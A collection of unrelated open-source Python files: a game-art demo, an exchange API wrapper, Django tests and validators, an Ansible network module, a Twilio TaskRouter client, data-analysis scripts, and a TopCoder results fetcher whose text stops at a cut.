from pydojo import * # CREATE GAME DISPLAY screen(1600, 900) turtle = Actor() turtle.hide() turtles = [] time = 0 # MAIN LOOP while True: clear() if ticks() - time > 100: t = clone(turtle) t.point(random.randint(-180, 180)) t.tag('turtle') t.speed = random.randint(1, 10) t.pendown() turtles.append(t) time = ticks() for t in getactors('turtle'): t.changepencolor(random.randint(1, 100)) t.forward(t.speed) t.bounce() t.setdirection(random.randint(t.direction - 10, t.direction + 10)) if t.collide('turtle'): t.point(random.randint(-180, 180)) # UPDATE SCREEN update()
sprintingkiwi/PYDOJO
example_random_art.py
Python
mit
705
from poloniex import Poloniex as Client from .Config import Config from .Logger import Logger from .ExchangeException import ExchangeException class Poloniex: def __init__(self, key, secret): self.logger = Logger(__name__) try: self.client = Client(key, secret) except Exception as e: self.logger.log(e) raise ExchangeException(self.__class__.__name__, e) def getBalances(self): try: result = self.client.returnBalances() balances = {} for currency in result: name = currency.upper() value = float(result[currency]) if value > Config.BALANCE_ZERO: balances[name] = value return balances except Exception as e: self.logger.log(e) raise ExchangeException(self.__class__.__name__, e)
msantl/cryptofolio
cryptofolio/api/Poloniex.py
Python
gpl-3.0
913
import unittest.mock as mock from django.conf import settings from django.test.utils import override_settings from test_plus import TestCase from badges.models import Badge from .factories import UserFactory, GroupFactory @override_settings(MINIMUM_YEAR_FOR_PIONNEER_BADGE=1) class TestPionneerBadge(TestCase): BADGE_LEVEL = settings.BADGE_LEVEL.BADGE_PIONNEER.value def setUp(self): self.group = GroupFactory.create(name=settings.DESIGNER_GROUP_NAME) def test_designer_recent_joined_badge(self): designer = UserFactory.create(groups=[self.group, ]) counter = Badge.objects.filter(user=designer, level=self.BADGE_LEVEL).count() self.assertEqual(counter, 0) def test_designer_date_joined_since_one_year(self): with mock.patch("studio.users.meta_badges.compute_age", return_value=1): designer = UserFactory.create(groups=[self.group, ]) counter = Badge.objects.filter(user=designer, level=self.BADGE_LEVEL).count() self.assertEqual(counter, 1) def test_designer_date_joined_since_more_one_year(self): with mock.patch("studio.users.meta_badges.compute_age", return_value=5): designer = UserFactory.create(groups=[self.group, ]) counter = Badge.objects.filter(user=designer, level=self.BADGE_LEVEL).count() self.assertEqual(counter, 1) def test_designer_date_joined_since_one_year_immutable(self): with mock.patch("studio.users.meta_badges.compute_age", return_value=1): designer = UserFactory.create(groups=[self.group, ]) counter = Badge.objects.filter(user=designer, level=self.BADGE_LEVEL).count() self.assertEqual(counter, 1) with mock.patch("studio.users.meta_badges.compute_age", return_value=1): designer.last_name = 'test_name' designer.save() counter = Badge.objects.filter(user=designer, level=self.BADGE_LEVEL).count() self.assertEqual(counter, 1) with mock.patch("studio.users.meta_badges.compute_age", return_value=4): designer.first_name = 'test_name' designer.save() counter = Badge.objects.filter(user=designer, level=self.BADGE_LEVEL).count() self.assertEqual(counter, 1)
moas/sketchbadges
exo/studio/users/tests/test_pionneer_badge.py
Python
mit
2,298
#!/usr/bin/python # # (c) 2017 Apstra Inc, <[email protected]> # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. # ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'community'} DOCUMENTATION = ''' --- module: aos_rack_type author: Damien Garros (@dgarros) version_added: "2.3" short_description: Manage AOS Rack Type description: - Apstra AOS Rack Type module let you manage your Rack Type easily. You can create create and delete Rack Type by Name, ID or by using a JSON File. This module is idempotent and support the I(check) mode. It's using the AOS REST API. requirements: - "aos-pyez >= 0.6.0" options: session: description: - An existing AOS session as obtained by M(aos_login) module. required: true name: description: - Name of the Rack Type to manage. Only one of I(name), I(id) or I(content) can be set. id: description: - AOS Id of the Rack Type to manage (can't be used to create a new Rack Type), Only one of I(name), I(id) or I(content) can be set. content: description: - Datastructure of the Rack Type to create. The data can be in YAML / JSON or directly a variable. It's the same datastructure that is returned on success in I(value). state: description: - Indicate what is the expected state of the Rack Type (present or not). default: present choices: ['present', 'absent'] ''' EXAMPLES = ''' - name: "Delete a Rack Type by name" aos_rack_type: session: "{{ aos_session }}" name: "my-rack-type" state: absent - name: "Delete a Rack Type by id" aos_rack_type: session: "{{ aos_session }}" id: "45ab26fc-c2ed-4307-b330-0870488fa13e" state: absent # Save a Rack Type to a file - name: "Access Rack Type 1/3" aos_rack_type: session: "{{ aos_session }}" name: "my-rack-type" state: present register: rack_type - name: "Save Rack Type into a JSON file 2/3" copy: content: "{{ rack_type.value | to_nice_json }}" dest: rack_type_saved.json - name: "Save Rack Type into a YAML file 3/3" copy: content: "{{ rack_type.value | to_nice_yaml }}" dest: rack_type_saved.yaml - name: "Load Rack Type from a JSON file" aos_rack_type: session: "{{ aos_session }}" content: "{{ lookup('file', 'resources/rack_type_saved.json') }}" state: present - name: "Load Rack Type from a YAML file" aos_rack_type: session: "{{ aos_session }}" content: "{{ lookup('file', 'resources/rack_type_saved.yaml') }}" state: present ''' RETURNS = ''' name: description: Name of the Rack Type returned: always type: str sample: AOS-1x25-1 id: description: AOS unique ID assigned to the Rack Type returned: always type: str sample: fcc4ac1c-e249-4fe7-b458-2138bfb44c06 value: description: Value of the object as returned by the AOS Server returned: always type: dict sample: {'...'} ''' import json from ansible.module_utils.basic import AnsibleModule from ansible.module_utils.network.aos.aos import get_aos_session, find_collection_item, do_load_resource, check_aos_version, content_to_dict ######################################################### # State Processing ######################################################### def rack_type_absent(module, aos, my_rack_type): margs = module.params # If the module do not exist, return directly if my_rack_type.exists is False: module.exit_json(changed=False, name=margs['name'], id=margs['id'], value={}) # If not in check mode, delete Rack Type if not module.check_mode: try: my_rack_type.delete() except: module.fail_json(msg="An error occurred, while trying to delete the Rack Type") module.exit_json( changed=True, name=my_rack_type.name, id=my_rack_type.id, value={} ) def rack_type_present(module, aos, my_rack_type): margs = module.params if margs['content'] is not None: if 'display_name' in module.params['content'].keys(): do_load_resource(module, aos.RackTypes, module.params['content']['display_name']) else: module.fail_json(msg="Unable to find display_name in 'content', Mandatory") # if rack_type doesn't exist already, create a new one if my_rack_type.exists is False and 'content' not in margs.keys(): module.fail_json(msg="'content' is mandatory for module that don't exist currently") module.exit_json( changed=False, name=my_rack_type.name, id=my_rack_type.id, value=my_rack_type.value ) ######################################################### # Main Function ######################################################### def rack_type(module): margs = module.params try: aos = get_aos_session(module, margs['session']) except: module.fail_json(msg="Unable to login to the AOS server") item_name = False item_id = False if margs['content'] is not None: content = content_to_dict(module, margs['content'] ) if 'display_name' in content.keys(): item_name = content['display_name'] else: module.fail_json(msg="Unable to extract 'display_name' from 'content'") elif margs['name'] is not None: item_name = margs['name'] elif margs['id'] is not None: item_id = margs['id'] #---------------------------------------------------- # Find Object if available based on ID or Name #---------------------------------------------------- my_rack_type = find_collection_item(aos.RackTypes, item_name=item_name, item_id=item_id) #---------------------------------------------------- # Proceed based on State value #---------------------------------------------------- if margs['state'] == 'absent': rack_type_absent(module, aos, my_rack_type) elif margs['state'] == 'present': rack_type_present(module, aos, my_rack_type) def main(): module = AnsibleModule( argument_spec=dict( session=dict(required=True, type="dict"), name=dict(required=False ), id=dict(required=False ), content=dict(required=False, type="json"), state=dict( required=False, choices=['present', 'absent'], default="present") ), mutually_exclusive = [('name', 'id', 'content')], required_one_of=[('name', 'id', 'content')], supports_check_mode=True ) # Check if aos-pyez is present and match the minimum version check_aos_version(module, '0.6.0') rack_type(module) if __name__ == "__main__": main()
kbrebanov/ansible
lib/ansible/modules/network/aos/aos_rack_type.py
Python
gpl-3.0
7,629
# reload seems to work for Python 2.3 but not 2.2. import time, os, sys import test_pyximport # debugging the 2.2 problem if 1: from distutils import sysconfig try: sysconfig.set_python_build() except AttributeError: pass import pyxbuild print pyxbuild.distutils.sysconfig == sysconfig def test(): tempdir = test_pyximport.make_tempdir() sys.path.append(tempdir) hello_file = os.path.join(tempdir, "hello.pyx") open(hello_file, "w").write("x = 1; print x; before = 'before'\n") import hello assert hello.x == 1 time.sleep(1) # sleep to make sure that new "hello.pyx" has later # timestamp than object file. open(hello_file, "w").write("x = 2; print x; after = 'after'\n") reload(hello) assert hello.x == 2, "Reload should work on Python 2.3 but not 2.2" test_pyximport.remove_tempdir(tempdir) if __name__=="__main__": test()
Teamxrtc/webrtc-streaming-node
third_party/webrtc/src/chromium/src/third_party/cython/src/pyximport/test/test_reload.py
Python
mit
934
from __future__ import division, print_function, unicode_literals # important: set cocos_utest=1 in the environment before run. # that simplifies the pyglet mockup needed # remember to erase or set to zero for normal runs import os assert os.environ['cocos_utest'] # set the desired pyglet mockup import sys sys.path.insert(0,'pyglet_mockup1') import pyglet assert pyglet.mock_level == 1 import cocos from cocos.director import director from cocos.cocosnode import CocosNode import cocos.actions as ac import sys director.init() rec = [] next_done=0 #bitflags class UAction(ac.Action): ##use actions names 1, 2 or '1', '2' ; then you instruct the .step method ##to set ._done using the global next_done def init(self, name): rec.append((name, 'init')) self.name = name def start(self): rec.append((self.name, 'start')) def step(self, dt): global rec, next_done rec.append((self.name, 'step', dt)) if int(self.name) & next_done: print('setting %s _done to True'%self.name) self._done = True def stop(self): rec.append((self.name, 'stop')) ## def done(self): ## rec.append((self.name, 'done', class UIntervalAction(ac.IntervalAction): def init(self, name, duration): rec.append((name, 'init')) self.duration = duration self.name = name def start(self): rec.append((self.name, 'start')) def step(self, dt): rec.append((self.name, 'step', dt)) super(UIntervalAction, self).step(dt) def update(self, fraction): rec.append((self.name, 'update', fraction)) def stop(self): rec.append((self.name, 'stop')) ## def done(self): ## rec.append((self.name, 'done', class Test_sequence: """ """ def test_InstantAction_duration0_action(self): global rec node = CocosNode() name1 = '1' name2 = '2' duration1 = 0.0 a = UIntervalAction(name1, duration1) b = UAction(name2) composite = a + b rec = [] worker = node.do(composite) dt = 0.1 node._step(dt) print(rec) assert rec[0] == (name1, 'start') assert rec[1] == (name1, 'step', dt) assert rec[2] == (name1, 'update', 1.0) assert rec[3] == (name1, 'stop') assert rec[4] == (name2, 'start') rec = [] node._step(dt) for e in rec: assert e[0]==name2
vyscond/cocos
utest/test_p_ba_operands_different_classes.py
Python
bsd-3-clause
2,493
import sys import os import pandas as pd import multiprocessing as mp import csv # this code is written for the merged file with combined pval & fdr. although it could have been written for the file without comb fisher and fdr, # it is easier to have the output with the comb pval and fdr and use what we need rather than have to search them in the merged file with comb pval and fdr # or run the next (create network) command to calc the combined pval and fdr. # cd /nfs3/PHARM/Morgun_Lab/richrr/Cervical_Cancer/analysis/merged/corr/gexpress/stage-ltest_corr/p1 """ SGE_Batch -c "python ~/Morgun_Lab/richrr/scripts/python/merging-python-script.py merged_gexp_sp_corr_p1_FolChMedian_merged-parallel-output.csv-comb-pval-output.csv 1 2" -m 150G -F 100G -r log_merge-py_1 -q biomed -M [email protected] -P 8 SGE_Batch -c "python ~/Morgun_Lab/richrr/scripts/python/merging-python-script.py merged_gexp_sp_corr_p1_FolChMedian_merged-parallel-output.csv-comb-pval-output.csv 2 2" -m 150G -F 100G -r log_merge-py_2 -q biomed -M [email protected] -P 8 SGE_Batch -c "python ~/Morgun_Lab/richrr/scripts/python/merging-python-script.py merged_gexp_sp_corr_p1_FolChMedian_merged-parallel-output.csv-comb-pval-output.csv 3 2" -m 150G -F 100G -r log_merge-py_3 -q biomed -M [email protected] -P 8 SGE_Batch -c "python ~/Morgun_Lab/richrr/scripts/python/merging-python-script.py merged_gexp_sp_corr_p1_FolChMedian_merged-parallel-output.csv-comb-pval-output.csv 4 2" -m 150G -F 100G -r log_merge-py_4 -q biomed -M [email protected] -P 8 """ infile = sys.argv[1] analysis = "Analys " + sys.argv[2] + " " numb_datasets = int(sys.argv[3]) # get the header line form the big file and decide which (analysis) columns to use header_line = '' with open(infile, 'r') as f: header_line = f.readline().strip() selcted_cols = [i for i, s in enumerate(header_line.split(',')) if analysis in s] #[s for s in header_line.split(',') if analysis in s] # get the lowest and highest and make range out of it # this way you get the combinedpval and combined fdr cols selcted_cols = range(min(selcted_cols), max(selcted_cols)+1) selcted_cols.insert(0, 0) # explicitly adding the row id cols print selcted_cols header_for_print = [header_line.split(',')[i] for i in selcted_cols] print header_for_print def process(df): res = list() for row in df.itertuples(): #print row corrs = row[1:numb_datasets+1] corrs_flag = 0 # write some condition to check for NA pos = sum(float(num) > 0 for num in corrs) neg = sum(float(num) < 0 for num in corrs) #print pos, neg if len(corrs) == pos and not len(corrs) == neg: #print "pos" corrs_flag = 1 if len(corrs) == neg and not len(corrs) == pos: #print "neg" corrs_flag = 1 if corrs_flag == 1: res.append(row) return res counter=0 pool = mp.Pool(30) # use 30 processes funclist = [] # http://gouthamanbalaraman.com/blog/distributed-processing-pandas.html #for chunck_df in pd.read_csv(infile, chunksize=100, usecols=range(5), index_col=0): for chunck_df in pd.read_csv(infile, chunksize=100000, usecols=selcted_cols, index_col=0): counter = counter + 1 print counter #print chunck_df # process each data frame f = pool.apply_async(process,[chunck_df]) funclist.append(f) #result = list() OUTfile = infile + analysis.replace(" ", "_") + '-same-dir-corrs.csv' with open(OUTfile, 'w') as of: writer = csv.writer(of, delimiter=',', lineterminator='\n') writer.writerow(header_for_print) for f in funclist: csvd = f.get(timeout=10000) # timeout in 10000 seconds #result.extend(csvd) writer.writerows(csvd) #print result # quick and dirty command to get the first column of the file: cutcmd = "cut -d, -f 1 " + OUTfile + " > " + OUTfile + "-ids.csv" os.system(cutcmd) print "Done" """ # sequential corrs_dict = dict() # satisfies corr direction counter = 0 # with open(in_filename) as in_f, open(out_filename, 'w') as out_f with open(infile) as f: for line in f: counter = counter + 1 line = line.strip() print line contents = line.split(",") corrs = contents[1:numb_datasets+1] corrs_flag = 0 if counter == 1: # move to next iteration of.write(line) continue # write some condition to check for NA pos = sum(float(num) > 0 for num in corrs) neg = sum(float(num) < 0 for num in corrs) #print pos, neg if len(corrs) == pos and not len(corrs) == neg: print "pos" corrs_flag = 1 if len(corrs) == neg and not len(corrs) == pos: print "neg" corrs_flag = 1 if corrs_flag == 1: corrs_dict[contents[0]] = contents[1:] ''' if corrs_flag == 0: # no point in analyzing pvals, move to next iteration continue pvals = contents[numb_datasets+1:] print pvals pvals_flag = 0 # write some condition to check for NA sig = sum(float(num) < 1 for num in pvals) #print sig if len(corrs) == sig: print "sig" pvals_flag = 1 if corrs_flag == 1 and pvals_flag == 1: corrs_dict[contents[0]] = contents[1:] if counter == 5: sys.exit(0) ''' print corrs_dict """
richrr/scripts
python/merging-python-script.py
Python
gpl-3.0
5,595
# encoding=utf-8 from __future__ import division import os import sys import chardet import jieba import jieba.posseg as pseg import jieba.analyse import HTMLParser reload(sys) sys.setdefaultencoding('utf-8') html_parser = HTMLParser.HTMLParser() jieba.analyse.set_stop_words("./stop_words.txt") corpus_file_name = './corpus.dat' def transfer_text(path): files = [] for path_, subdirs_, files_ in os.walk(path): for file in files_: if 'txt' in file: files.append(path_ + "/" + file) text_file_handle = open(corpus_file_name,'w') for input_name in files: lines = open(input_name,"r") for line in lines: if 0 != len(line.strip()): try: text_buf = filter_text(line.decode('cp936'),input_name) if len(text_buf) > 0: text_file_handle.write(" ".join(text_buf)) text_file_handle.write("\n"); except Exception as err: continue lines.close() text_file_handle.close() def filter_text(buf,file_name): # get rid of html escape character buf = html_parser.unescape(buf) buf = buf.strip() buf = jieba.analyse.extract_tags(buf) buf = " ".join(buf) words = pseg.cut(buf) part_of_speech = ['x','d','b','m','u','t','uj','ul','c','p'] part_of_speech = ['n','v','vn'] texts = [] for word, flag in words: if flag not in part_of_speech: continue texts.append(word) return texts from gensim import corpora,models,similarities from pprint import pprint import logging logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO) class my_corpus(object): def __init__(self,file_name): self.file_name = file_name def __iter__(self): for line in open(self.file_name): yield line.split() def query_sims(corpus_file_name = 'test/gensim_tutorial/mycorpus.txt',query = "System and human",top_N = 20): texts = [] corpus_data = my_corpus(corpus_file_name) for vec in corpus_data: texts.append(vec) ''' texts's format [['human', 'interface', 'computer'],['survey', 'user', 'computer', 'system', 'response', 'time']] ''' dictionary = corpora.Dictionary(texts) #pprint (dictionary.token2id) corpus = [dictionary.doc2bow(text) for text in texts] tfidf = models.TfidfModel(corpus) corpus_tfidf = tfidf[corpus] ''' for doc in corpus_tfidf: print doc ''' topic_num = top_N lsi = models.LsiModel(corpus_tfidf, id2word=dictionary, num_topics=topic_num) lsi.print_topics(topic_num) corpus_lsi = lsi[corpus_tfidf] ''' for doc in corpus_lsi: print doc ''' print lsi[corpus].__dict__ index = similarities.MatrixSimilarity(lsi[corpus]) query_bow = dictionary.doc2bow(query.lower().split()) query_lsi = lsi[query_bow] sims = index[query_lsi] sort_sims = sorted(enumerate(sims), key=lambda item: -item[1]) return sort_sims[0:10] print query_sims() #transfer_text("./SogouC.reduced/Reduced") #print query_sims(corpus_file_name,"战法 演习 红军 对抗 出难题 心理战 对抗性 低能 打磨 必胜 透 演练 弱者 敌情",20)
yuyunliuhen/automatic-text-categorization
gensim_sims.py
Python
mit
2,959
import re from django.core.validators import EmailValidator, URLValidator from django.db.models.loading import get_model from django.forms import ValidationError from tower import ugettext as _ def validate_twitter(username): """Return a twitter username given '@' or http(s) strings.""" if username: username = re.sub('https?://(www\.)?twitter\.com/|@', '', username) # Twitter accounts must be alphanumeric ASCII including underscore, and <= 15 chars. # https://support.twitter.com/articles/101299-why-can-t-i-register-certain-usernames if len(username) > 15: raise ValidationError(_('Twitter usernames cannot be longer than 15 characters.')) if not re.match('^\w+$', username): raise ValidationError(_('Twitter usernames must contain only alphanumeric' ' characters and the underscore.')) return username def validate_username(username): """Validate username. Import modules here to prevent dependency breaking. """ username = username.lower() UsernameBlacklist = get_model('users', 'UsernameBlacklist') if UsernameBlacklist.objects.filter(value=username, is_regex=False).exists(): return False for regex_value in UsernameBlacklist.objects.filter(is_regex=True): if re.match(regex_value.value, username): return False return True def validate_website(url): """Validate and return a properly formatted website url.""" validate_url = URLValidator() if url and '://' not in url: url = u'http://%s' % url try: validate_url(url) except ValidationError: raise ValidationError(_('Enter a valid URL.')) return url def validate_username_not_url(username): """Validate that a username is not a URL.""" if username.startswith('http://') or username.startswith('https://'): raise ValidationError(_('This field requires an identifier, not a URL.')) return username def validate_email(value): """Validate that a username is email like.""" _validate_email = EmailValidator() try: _validate_email(value) except ValidationError: raise ValidationError(_('Enter a valid email address.')) return value def validate_phone_number(value): """Validate that a phone number is in international format. (5-15 characters).""" value = value.replace(' ', '') value = re.sub(r'^00', '+', value) # Ensure that there are 5 to 15 digits pattern = re.compile(r'^\+\d{5,15}$') if not pattern.match(value): raise ValidationError(_('Please enter a valid phone number in international format ' '(e.g. +1 555 555 5555)')) return value
chirilo/mozillians
mozillians/phonebook/validators.py
Python
bsd-3-clause
2,774
# -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import models, migrations class Migration(migrations.Migration): dependencies = [ ('core', '0012_auto_20150508_0958'), ] operations = [ migrations.RemoveField( model_name='generalledgeraccount', name='meta', ), migrations.RemoveField( model_name='generalledgerentry', name='meta', ), ]
AjabWorld/ajabsacco
ajabsacco/core/migrations/0013_auto_20150508_1143.py
Python
apache-2.0
474
# coding=utf-8 r""" This code was generated by \ / _ _ _| _ _ | (_)\/(_)(_|\/| |(/_ v1.0.0 / / """ from twilio.base import serialize from twilio.base import values from twilio.base.instance_context import InstanceContext from twilio.base.instance_resource import InstanceResource from twilio.base.list_resource import ListResource from twilio.base.page import Page class TaskQueueStatisticsList(ListResource): def __init__(self, version, workspace_sid, task_queue_sid): """ Initialize the TaskQueueStatisticsList :param Version version: Version that contains the resource :param workspace_sid: The SID of the Workspace that contains the TaskQueue :param task_queue_sid: The SID of the TaskQueue from which these statistics were calculated :returns: twilio.rest.taskrouter.v1.workspace.task_queue.task_queue_statistics.TaskQueueStatisticsList :rtype: twilio.rest.taskrouter.v1.workspace.task_queue.task_queue_statistics.TaskQueueStatisticsList """ super(TaskQueueStatisticsList, self).__init__(version) # Path Solution self._solution = {'workspace_sid': workspace_sid, 'task_queue_sid': task_queue_sid, } def get(self): """ Constructs a TaskQueueStatisticsContext :returns: twilio.rest.taskrouter.v1.workspace.task_queue.task_queue_statistics.TaskQueueStatisticsContext :rtype: twilio.rest.taskrouter.v1.workspace.task_queue.task_queue_statistics.TaskQueueStatisticsContext """ return TaskQueueStatisticsContext( self._version, workspace_sid=self._solution['workspace_sid'], task_queue_sid=self._solution['task_queue_sid'], ) def __call__(self): """ Constructs a TaskQueueStatisticsContext :returns: twilio.rest.taskrouter.v1.workspace.task_queue.task_queue_statistics.TaskQueueStatisticsContext :rtype: twilio.rest.taskrouter.v1.workspace.task_queue.task_queue_statistics.TaskQueueStatisticsContext """ return TaskQueueStatisticsContext( self._version, workspace_sid=self._solution['workspace_sid'], task_queue_sid=self._solution['task_queue_sid'], ) def __repr__(self): """ Provide a friendly representation :returns: Machine friendly representation :rtype: str """ return '<Twilio.Taskrouter.V1.TaskQueueStatisticsList>' class TaskQueueStatisticsPage(Page): def __init__(self, version, response, solution): """ Initialize the TaskQueueStatisticsPage :param Version version: Version that contains the resource :param Response response: Response from the API :param workspace_sid: The SID of the Workspace that contains the TaskQueue :param task_queue_sid: The SID of the TaskQueue from which these statistics were calculated :returns: twilio.rest.taskrouter.v1.workspace.task_queue.task_queue_statistics.TaskQueueStatisticsPage :rtype: twilio.rest.taskrouter.v1.workspace.task_queue.task_queue_statistics.TaskQueueStatisticsPage """ super(TaskQueueStatisticsPage, self).__init__(version, response) # Path Solution self._solution = solution def get_instance(self, payload): """ Build an instance of TaskQueueStatisticsInstance :param dict payload: Payload response from the API :returns: twilio.rest.taskrouter.v1.workspace.task_queue.task_queue_statistics.TaskQueueStatisticsInstance :rtype: twilio.rest.taskrouter.v1.workspace.task_queue.task_queue_statistics.TaskQueueStatisticsInstance """ return TaskQueueStatisticsInstance( self._version, payload, workspace_sid=self._solution['workspace_sid'], task_queue_sid=self._solution['task_queue_sid'], ) def __repr__(self): """ Provide a friendly representation :returns: Machine friendly representation :rtype: str """ return '<Twilio.Taskrouter.V1.TaskQueueStatisticsPage>' class TaskQueueStatisticsContext(InstanceContext): def __init__(self, version, workspace_sid, task_queue_sid): """ Initialize the TaskQueueStatisticsContext :param Version version: Version that contains the resource :param workspace_sid: The SID of the Workspace with the TaskQueue to fetch :param task_queue_sid: The SID of the TaskQueue for which to fetch statistics :returns: twilio.rest.taskrouter.v1.workspace.task_queue.task_queue_statistics.TaskQueueStatisticsContext :rtype: twilio.rest.taskrouter.v1.workspace.task_queue.task_queue_statistics.TaskQueueStatisticsContext """ super(TaskQueueStatisticsContext, self).__init__(version) # Path Solution self._solution = {'workspace_sid': workspace_sid, 'task_queue_sid': task_queue_sid, } self._uri = '/Workspaces/{workspace_sid}/TaskQueues/{task_queue_sid}/Statistics'.format(**self._solution) def fetch(self, end_date=values.unset, minutes=values.unset, start_date=values.unset, task_channel=values.unset, split_by_wait_time=values.unset): """ Fetch the TaskQueueStatisticsInstance :param datetime end_date: Only calculate statistics from on or before this date :param unicode minutes: Only calculate statistics since this many minutes in the past :param datetime start_date: Only calculate statistics from on or after this date :param unicode task_channel: Only calculate real-time and cumulative statistics for the specified TaskChannel :param unicode split_by_wait_time: A comma separated list of values that describes the thresholds to calculate statistics on :returns: The fetched TaskQueueStatisticsInstance :rtype: twilio.rest.taskrouter.v1.workspace.task_queue.task_queue_statistics.TaskQueueStatisticsInstance """ data = values.of({ 'EndDate': serialize.iso8601_datetime(end_date), 'Minutes': minutes, 'StartDate': serialize.iso8601_datetime(start_date), 'TaskChannel': task_channel, 'SplitByWaitTime': split_by_wait_time, }) payload = self._version.fetch(method='GET', uri=self._uri, params=data, ) return TaskQueueStatisticsInstance( self._version, payload, workspace_sid=self._solution['workspace_sid'], task_queue_sid=self._solution['task_queue_sid'], ) def __repr__(self): """ Provide a friendly representation :returns: Machine friendly representation :rtype: str """ context = ' '.join('{}={}'.format(k, v) for k, v in self._solution.items()) return '<Twilio.Taskrouter.V1.TaskQueueStatisticsContext {}>'.format(context) class TaskQueueStatisticsInstance(InstanceResource): def __init__(self, version, payload, workspace_sid, task_queue_sid): """ Initialize the TaskQueueStatisticsInstance :returns: twilio.rest.taskrouter.v1.workspace.task_queue.task_queue_statistics.TaskQueueStatisticsInstance :rtype: twilio.rest.taskrouter.v1.workspace.task_queue.task_queue_statistics.TaskQueueStatisticsInstance """ super(TaskQueueStatisticsInstance, self).__init__(version) # Marshaled Properties self._properties = { 'account_sid': payload.get('account_sid'), 'cumulative': payload.get('cumulative'), 'realtime': payload.get('realtime'), 'task_queue_sid': payload.get('task_queue_sid'), 'workspace_sid': payload.get('workspace_sid'), 'url': payload.get('url'), } # Context self._context = None self._solution = {'workspace_sid': workspace_sid, 'task_queue_sid': task_queue_sid, } @property def _proxy(self): """ Generate an instance context for the instance, the context is capable of performing various actions. All instance actions are proxied to the context :returns: TaskQueueStatisticsContext for this TaskQueueStatisticsInstance :rtype: twilio.rest.taskrouter.v1.workspace.task_queue.task_queue_statistics.TaskQueueStatisticsContext """ if self._context is None: self._context = TaskQueueStatisticsContext( self._version, workspace_sid=self._solution['workspace_sid'], task_queue_sid=self._solution['task_queue_sid'], ) return self._context @property def account_sid(self): """ :returns: The SID of the Account that created the resource :rtype: unicode """ return self._properties['account_sid'] @property def cumulative(self): """ :returns: An object that contains the cumulative statistics for the TaskQueue :rtype: dict """ return self._properties['cumulative'] @property def realtime(self): """ :returns: An object that contains the real-time statistics for the TaskQueue :rtype: dict """ return self._properties['realtime'] @property def task_queue_sid(self): """ :returns: The SID of the TaskQueue from which these statistics were calculated :rtype: unicode """ return self._properties['task_queue_sid'] @property def workspace_sid(self): """ :returns: The SID of the Workspace that contains the TaskQueue :rtype: unicode """ return self._properties['workspace_sid'] @property def url(self): """ :returns: The absolute URL of the TaskQueue statistics resource :rtype: unicode """ return self._properties['url'] def fetch(self, end_date=values.unset, minutes=values.unset, start_date=values.unset, task_channel=values.unset, split_by_wait_time=values.unset): """ Fetch the TaskQueueStatisticsInstance :param datetime end_date: Only calculate statistics from on or before this date :param unicode minutes: Only calculate statistics since this many minutes in the past :param datetime start_date: Only calculate statistics from on or after this date :param unicode task_channel: Only calculate real-time and cumulative statistics for the specified TaskChannel :param unicode split_by_wait_time: A comma separated list of values that describes the thresholds to calculate statistics on :returns: The fetched TaskQueueStatisticsInstance :rtype: twilio.rest.taskrouter.v1.workspace.task_queue.task_queue_statistics.TaskQueueStatisticsInstance """ return self._proxy.fetch( end_date=end_date, minutes=minutes, start_date=start_date, task_channel=task_channel, split_by_wait_time=split_by_wait_time, ) def __repr__(self): """ Provide a friendly representation :returns: Machine friendly representation :rtype: str """ context = ' '.join('{}={}'.format(k, v) for k, v in self._solution.items()) return '<Twilio.Taskrouter.V1.TaskQueueStatisticsInstance {}>'.format(context)
twilio/twilio-python
twilio/rest/taskrouter/v1/workspace/task_queue/task_queue_statistics.py
Python
mit
11,519
from django.db.models import Q from django.shortcuts import get_object_or_404, redirect from itertools import chain from trix.trix_core.models import Course from trix.trix_course.views import base class CourseAdminView(base.TrixCourseBaseView): model = Course template_name = "trix_course/course_admin.django.html" def get(self, request, **kwargs): self.course = get_object_or_404(Course, id=kwargs['course_id']) return super(CourseAdminView, self).get(request, **kwargs) def get_context_data(self, **kwargs): context = super(CourseAdminView, self).get_context_data(**kwargs) context['course'] = self.course # Check if user is course owner context['owner'] = self.request.user.is_course_owner(self.course) admin_list = self.course.admins.all() search = self.request.GET.get('q') if search: owner = True if search == "owner" else False admin_list = admin_list.filter(Q(email__icontains=search) | Q(owner=owner)) context['admin_list'] = admin_list return context
devilry/trix2
trix/trix_course/views/administer.py
Python
bsd-3-clause
1,137
#!/usr/bin/env python # -*- coding: utf-8 -*- import sys import urllib2 import os import time from xml.dom.minidom import parseString def ox(resultText): return u'○' if resultText == 'Passed System Test' else u'×' def getData(row, tagName, text=''): cnode = row.getElementsByTagName(tagName)[0].childNodes return cnode[0].data if len(cnode) > 0 else text argv = sys.argv argc = len(argv) if argc < 2: print 'usage: python %s handle [srmNumber]' % argv[0] quit() name = argv[1] srm = argv[2] if argc > 2 else '' # print name roundListUrl = 'http://www.topcoder.com/tc?module=BasicData&c=dd_round_list' cacheFile = os.sep.join([os.environ['HOME'], '.topcoder', 'dd_round_list.xml']) # -f つけたら強制的に取得してくる実装にしたい if not os.path.exists(cacheFile) or time.time() - os.stat(cacheFile).st_mtime > 7 * 24 * 60 * 60: f = urllib2.urlopen(roundListUrl) cfile = open(cacheFile, 'w') cfile.write(f.read()) cfile.close() f = open(cacheFile, 'r') dom = parseString(f.read()) roundId = '' roundName = '' if srm == '': row = dom.getElementsByTagName('row')[-1] roundId = getData(row, 'round_id') roundName = getData(row, 'short_name') else: for row in dom.getElementsByTagName('row'): roundName = getData(row, 'short_name') if srm in roundName: roundId = getData(row, 'round_id') break if roundId == '': print 'invalid srm number' quit() # print roundDataUrl roundDataUrl = 'http://www.topcoder.com/tc?module=BasicData&c=dd_round_results&rd='+roundId roundResultFilename = 'dd_round_result.' + roundId + '.xml' cacheFile = os.sep.join([os.environ['HOME'], '.topcoder', roundResultFilename]) if not os.path.exists(cacheFile): f = urllib2.urlopen(roundDataUrl) cfile = open(cacheFile, 'w') cfile.write(f.read()) cfile.close() f = open(cacheFile, 'r') dom = parseString(f.read()) for row in dom.getElementsByTagName('row'): handle = getData(row, 'handle') if handle == name: print roundName, print ox(getData(row, 'level_one_status')), print 